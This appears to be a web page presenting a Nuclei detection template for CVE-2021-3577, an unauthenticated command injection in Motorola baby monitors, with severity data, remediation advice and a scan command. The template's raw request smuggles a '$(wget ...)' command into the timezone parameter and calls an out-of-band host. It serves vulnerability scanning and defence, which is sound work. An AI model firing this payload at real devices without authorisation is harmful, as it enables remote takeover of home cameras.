Skip to content

Motorola Baby Monitors - Remote Command Execution

ID: CVE-2021-3577

Severity: high

Author: gy741

Tags: cve2021,cve,rce,oast,motorola,iot,binatoneglobal

Motorola Baby Monitors contains multiple interface vulnerabilities could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.

id: CVE-2021-3577
info:
name: Motorola Baby Monitors - Remote Command Execution
author: gy741
severity: high
description: Motorola Baby Monitors contains multiple interface vulnerabilities could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device, potentially leading to unauthorized access, data theft, or further compromise of the network.
remediation: |
Apply the latest firmware update provided by Motorola to mitigate the vulnerability and ensure the device is not accessible from untrusted networks.
reference:
- https://randywestergren.com/unauthenticated-remote-code-execution-in-motorola-baby-monitors/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3577
- https://binatoneglobal.com/security-advisory/
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2021-3577
cwe-id: CWE-863,CWE-78
epss-score: 0.95748
epss-percentile: 0.99426
cpe: cpe:2.3:o:binatoneglobal:halo\+_camera_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: binatoneglobal
product: halo\+_camera_firmware
tags: cve2021,cve,rce,oast,motorola,iot,binatoneglobal
http:
- raw:
- |
GET /?action=command&command=set_city_timezone&value=$(wget%20http://{{interactsh-url}})) HTTP/1.1
Host: {{Hostname}}
Accept: */*
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: word
words:
- "set_city_timezone"
- type: status
status:
- 200
# digest: 4a0a00473045022055bbff879103b68c10ce880bef7e58e3aaccffe5a0131dc2b1adb3490d17b6f3022100f0a781cc881086a5e6b801ddb1fe25debc0753f023bbfe4b5d67c78a32db6838:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-3577.yaml"

View on Github